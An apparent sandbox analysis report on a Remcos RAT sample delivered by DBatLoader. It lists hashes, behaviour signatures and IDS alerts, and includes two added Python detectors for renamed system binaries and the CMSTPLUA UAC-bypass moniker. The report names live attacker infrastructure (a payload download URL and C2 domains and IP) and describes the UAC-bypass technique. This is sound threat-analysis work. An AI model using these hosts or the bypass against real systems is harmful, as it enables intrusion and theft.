Windows Analysis Report
jW3NEKvxH1.exe

Overview

General Information

Sample name: jW3NEKvxH1.exe (renamed because the original name is a hash value)
Original sample name: e4696be1368f7ac260c605c7b4f7eeaf.exe
Analysis ID: 1569880
MD5: e4696be1368f7ac260c605c7b4f7eeaf
SHA1: d73a7226926b44f66d94ff7b229ef8243976eb6d
SHA256: 592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
Tags: exe, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name: Remcos (also RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: jW3NEKvxH1.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}
Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF ReversingLabs: Detection: 55%
Source: jW3NEKvxH1.exe ReversingLabs: Detection: 55%
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0295293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 6_2_0295293A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0297293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 19_2_0297293A
Source: jW3NEKvxH1.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926764 _wcslen,CoGetObject, 6_2_02926764
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946764 _wcslen,CoGetObject, 19_2_02946764
Source: jW3NEKvxH1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2245097882.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000009.00000000.2272956424.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000A.00000000.2294839083.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
Source: Binary string: easinvoker.pdbH source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A3E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F920000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B2D000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B5E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.000000000282C000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.000000000282E000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266110150.0000000002366000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000B.00000002.2390955236.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000011.00000002.2395576863.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000012.00000000.2403173477.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif, 00000014.00000000.2410473637.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, alpha.pif.4.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2265634215.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000C.00000002.2390214130.0000000000841000.00000020.00000001.01000000.00000008.sdmp, xpha.pif.8.dr
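The cmd.pdb and ping.pdb strings above come from alpha.pif and xpha.pif, i.e. the loader copied cmd.exe and ping.exe to C:\Users\Public under new names (the "Drops or copies cmd.exe with a different name" signature). The CodeView debug record is a cheap way to catch that on disk: the PDB name still says what the binary really is. The triage helper below is an added example and not part of the Joe Sandbox report; the PDB-to-binary mapping is an assumption for these two LOLBins, and the sample bytes are constructed here (they carry an RSDS record but are not a valid PE).

```python
"""Flag PE files whose CodeView record names a Windows system binary
(cmd.pdb, ping.pdb) while the file itself carries another name, as with
alpha.pif and xpha.pif in this report. Added example, not report code."""
import re
import struct

# Assumed mapping for the two LOLBins seen here; extend as needed.
SYSTEM_PDB_TO_EXE = {"cmd.pdb": "cmd.exe", "ping.pdb": "ping.exe"}
ODD_EXTENSIONS = (".pif", ".scr", ".com")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
RSDS = b"RSDS"


def pdb_paths(data: bytes):
    """PDB paths from every CodeView RSDS record in the blob.
    Record layout: 'RSDS' + 16-byte GUID + 4-byte age + NUL-terminated path."""
    paths, start = [], 0
    while (i := data.find(RSDS, start)) >= 0:
        head = i + 4 + 16 + 4
        end = data.find(b"\x00", head)
        if head < len(data) and end > head:
            path = data[head:end]
            # Reject hits whose "path" is not printable ASCII (random RSDS bytes).
            if re.fullmatch(rb"[\x20-\x7e]+", path):
                paths.append(path.decode("ascii"))
        start = i + 4
    return paths


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def renamed_system_binary(filename: str, data: bytes):
    """(pdb_name, expected_exe) when the file is a known system binary
    under another name, else None."""
    actual = basename(filename)
    for p in pdb_paths(data):
        expected = SYSTEM_PDB_TO_EXE.get(basename(p))
        if expected and actual != expected:
            return basename(p), expected
    return None


def triage(path: str, data: bytes):
    """All findings for one file, as short strings."""
    findings = []
    low = path.lower()
    if low.endswith(ODD_EXTENSIONS) and low.startswith(USER_WRITABLE):
        findings.append("executable with unusual extension in a user-writable folder")
    hit = renamed_system_binary(path, data)
    if hit:
        findings.append(f"PDB name {hit[0]} indicates a renamed copy of {hit[1]}")
    return findings


def make_sample(pdb_name: bytes) -> bytes:
    """Constructed stand-in for a dropped file: MZ bytes, padding and one
    RSDS record. Not a valid PE; only the debug record matters here."""
    guid, age = bytes(range(16)), struct.pack("<I", 1)
    return b"MZ" + b"\x00" * 60 + RSDS + guid + age + pdb_name + b"\x00" + b"\x90" * 8


if __name__ == "__main__":
    for name, pdb in (("C:\\Users\\Public\\alpha.pif", b"cmd.pdb"),
                      ("C:\\Users\\Public\\xpha.pif", b"ping.pdb"),
                      ("C:\\Windows\\System32\\cmd.exe", b"cmd.pdb")):
        print(name, "->", triage(name, make_sample(pdb)) or "clean")
```

Run it over the loader's drop directory (C:\Users\Public in this run) rather than System32, where the same PDB names are expected. A scan of the whole file for "RSDS" is deliberate: it also works on memory dumps and on files whose PE headers have been damaged, at the cost of an occasional false hit that the printable-ASCII check filters.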
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02D35908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 6_2_0292B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 6_2_0293B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0296D5E9 FindFirstFileExA, 6_2_0296D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 6_2_0292B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02927A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 6_2_02927A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926AC2 FindFirstFileW,FindNextFileW, 6_2_02926AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029289A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 6_2_029289A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02938C69 FindFirstFileW,FindNextFileW,FindNextFileW, 6_2_02938C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02928DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 6_2_02928DA7
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 9_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 9_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 9_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 9_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 9_2_00E3532E
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E4589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 11_2_00E4589A
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E40207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 11_2_00E40207
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E44EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E53E66 FindFirstFileW,FindNextFileW,FindClose, 11_2_00E53E66
Source: C:\Users\Public\alpha.pif Code function: 11_2_00E3532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 11_2_00E3532E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 19_2_0294B335
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 19_2_0295B42F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0298D5E9 FindFirstFileExA, 19_2_0298D5E9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0294B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 19_2_0294B53A
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02947A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 19_2_02947A8C
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02946AC2 FindFirstFileW,FindNextFileW, 19_2_02946AC2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029489A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 19_2_029489A9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02958C69 FindFirstFileW,FindNextFileW,FindNextFileW, 19_2_02958C69
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02948DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 19_2_02948DA7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02926F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 6_2_02926F06
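The _wcslen,CoGetObject pairs at the top of this section, together with the "Yara detected UAC Bypass using CMSTP" hit, are the fingerprint of the CMSTPLUA auto-elevation trick: the implant passes an "Elevation:Administrator!new:{CLSID}" moniker to CoGetObject and then drives the elevated COM object. Two checks an analyst can run for it follow, as an added example that is not part of the Joe Sandbox report. The CLSID is the documented CMSTPLUA class id; the process records are constructed in the Sysmon event-1 field layout and are not from this run.

```python
"""Two checks for the CMSTPLUA UAC bypass: the elevation moniker string
in a binary or memory dump, and the process lineage the bypass produces.
Added example, not report code; events below are constructed."""
import re

CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
# CoGetObject("Elevation:Administrator!new:{CLSID}") is the auto-elevation
# moniker; the bypass names CMSTPLUA's CLSID and then calls its ShellExec.
MONIKER_RE = re.compile(rb"Elevation:Administrator!new:(\{[0-9A-Fa-f-]{36}\})")


def elevation_monikers(data: bytes):
    """CLSIDs of every elevation moniker in the blob, matched as ASCII and
    as UTF-16LE at both byte alignments, upper-cased and de-duplicated."""
    blobs = [data]
    for off in (0, 1):  # a wide string may start on either byte boundary
        blobs.append(data[off:].decode("utf-16-le", "ignore").encode("ascii", "ignore"))
    return sorted({m.group(1).decode().upper() for b in blobs for m in MONIKER_RE.finditer(b)})


def uses_cmstplua_moniker(data: bytes) -> bool:
    return CMSTPLUA_CLSID in elevation_monikers(data)


def cmstplua_lineage_hits(events):
    """events: dicts using Sysmon event-1 field names. When the bypass
    fires, the elevated child is spawned by the COM surrogate
    'dllhost.exe /Processid:{CMSTPLUA CLSID}', which is what we match."""
    hits = []
    for e in events:
        parent_img = e.get("ParentImage", "").lower()
        parent_cl = e.get("ParentCommandLine", "").upper()
        if (parent_img.endswith("\\dllhost.exe")
                and CMSTPLUA_CLSID in parent_cl
                and e.get("IntegrityLevel") in ("High", "System")):
            hits.append(e["Image"])
    return hits


# Constructed events: a benign launch, a bypass child, another COM surrogate.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\notepad.exe", "IntegrityLevel": "Medium",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "IntegrityLevel": "High",
     "ParentImage": "C:\\Windows\\System32\\dllhost.exe",
     "ParentCommandLine": "C:\\Windows\\system32\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"Image": "C:\\Windows\\System32\\rundll32.exe", "IntegrityLevel": "High",
     "ParentImage": "C:\\Windows\\System32\\dllhost.exe",
     "ParentCommandLine": "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}"},
]
# Constructed memory fragment: one stray byte, then the moniker as a wide string.
SAMPLE_WIDE = b"\x41" + "Elevation:Administrator!new:{3e5fc7f9-9a51-4367-9063-a120244fbec7}".encode("utf-16-le")

if __name__ == "__main__":
    print("monikers in dump:", elevation_monikers(SAMPLE_WIDE))
    print("elevated children of CMSTPLUA surrogate:", cmstplua_lineage_hits(SAMPLE_EVENTS))
```

Two caveats. The report only shows the capability (the CoGetObject call sites and the Yara match), not that an elevation succeeded in this run. And dllhost.exe hosting CMSTPLUA is not malicious by itself, so the lineage rule should be judged with the child image and the surrogate's own parent in view rather than alerted on alone.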

Networking

Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49730 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49856 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49914 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49967 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50018 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50031 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50030 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50028 -> 104.243.42.254:5874
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 104.243.42.254:5874
Source: Malware configuration extractor URLs: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
Source: Malware configuration extractor URLs: zara.master-workdone.com.ua
Source: Malware configuration extractor URLs: manazara.master-workdone.com.ua
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D4E4B8 InternetCheckConnectionA, 0_2_02D4E4B8
Source: global traffic TCP traffic: 192.168.2.6:49730 -> 104.243.42.254:5874
